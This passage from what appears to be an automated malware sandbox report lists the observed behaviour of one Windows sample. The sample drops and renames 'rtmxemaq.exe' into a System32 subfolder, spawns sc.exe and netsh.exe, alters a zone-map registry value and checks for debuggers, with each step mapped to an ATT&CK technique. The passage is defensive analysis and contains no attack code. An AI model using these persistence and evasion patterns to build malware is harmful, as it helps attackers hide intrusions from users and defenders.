\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"rtmxemaq.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" reads file \"c:\\952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe.Local\\\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\952C4806FDC7DDA64C80FCC7292F3CC1E9431295349972ECFEB410A76517D9F4.EXE.LOCAL\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\rtmxemaq.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"952C4806FDC7DDA64C80FCC7292F3CC1E9431295349972ECFEB410A76517D9F4\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"rtmxemaq.exe.67B73BE7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rtmxemaq.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\rtmxemaq.exe]- [targetUID: 00000000-00005928]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"rtmxemaq.exe.67B73BE7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rtmxemaq.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\rtmxemaq.exe]- [targetUID: 00000000-00005928]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rtmxemaq.exe\" to \"%WINDIR%\\system32\\xtblsmos\\rtmxemaq.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00002212-00000105-294705 [PID: 2212]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002212-00000105-1031691 [PID: 2212]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002212-00000105-3392332 [PID: 2212]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002212-00000105-3610704 [PID: 2212]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002212-00000105-4081150 [PID: 2212]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002212-00000105-4297531 [PID: 2212]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002212-00000105-5189126 [PID: 2212]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00003660-00000105-78007 [PID: 3660]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00003660-00000105-399045 [PID: 3660]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EC40000\n \"rtmxemaq.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EC40000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EC40000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00002212-00000105-7816812", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" queries volume information of \"C:\\\" at 00000000-00006024-0000010C-1978012\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" queries volume information of \"C:\\\" at 00000000-00006024-0000010C-1979703\n \"rtmxemaq.exe\" queries volume information of \"C:\\\" at 00000000-00003744-0000010C-1711361\n \"rtmxemaq.exe\" queries volume information of \"C:\\\" at 00000000-00003744-0000010C-1712691\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003660-0000010C-36382\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003660-0000010C-662459\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003660-0000010C-2200509\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003660-0000010C-2201879", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5cb0774379ac75ffffffff0c0000004c62b0771f79ac75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e170000000000 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b203100720600000088ea0676ecf91200b344907288000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b400086fdc3b3bcf51200616b400088000000f822410081a80676ecf9120000009001005ec800000200000800000068315d00 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006024)\n \"952c4806fdc7dda64c80fcc7292f3cc1e9431295349972ecfeb410a76517d9f4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebc477203d370000f0fd7f9a5cb27700d0fd7fb0c95a0144f0fd7f00000000400000003f0000002500000000f0fd7fa4c95a01c15cb2776082b9772500000000f0fd7f9a5cb27700d0fd7fc8c95a015789b1778083b9771317ad75d8ebc477 (UID: 00000000-00006024)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000d06e3900b8fc6600145cb177435cb17784fd660001000000940137000100000038fc6600935cb2774083b977d4a0b17737f4cf7784fd6600010000000100000000c039000000000008fc660038fc6600a4fc660095e1ad77f70c1800feffffffd4a0b1771bbeac750000107600000000 (UID: 00000000-00005872)\n \"sc.exe\" called \"GetVersionExA\" with parameter 